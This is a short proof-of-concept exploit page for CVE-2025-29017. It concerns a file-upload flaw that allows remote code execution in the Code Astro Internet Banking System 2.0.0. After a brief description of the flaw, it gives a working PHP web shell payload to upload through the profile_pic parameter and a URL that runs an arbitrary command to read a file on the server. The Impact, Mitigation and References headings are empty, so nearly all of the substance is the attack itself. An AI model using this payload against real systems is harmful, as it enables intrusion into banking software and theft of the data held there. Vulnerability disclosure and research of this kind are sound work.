
Proof-of-concept exploit for CVE-2025-29017, demonstrating remote code execution via malicious file upload in Code Astro Internet Banking System 2.0.0.
A Remote Code Execution (RCE) vulnerability exists in Code Astro Internet Banking System 2.0.0 due to improper file upload validation in the profile_pic parameter within pages_view_client.php. Attackers can bypass security checks by modifying the upload request, leading to arbitrary code execution.
profile_pic parameter in pages_view_client.php


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

Impact
Mitigation
References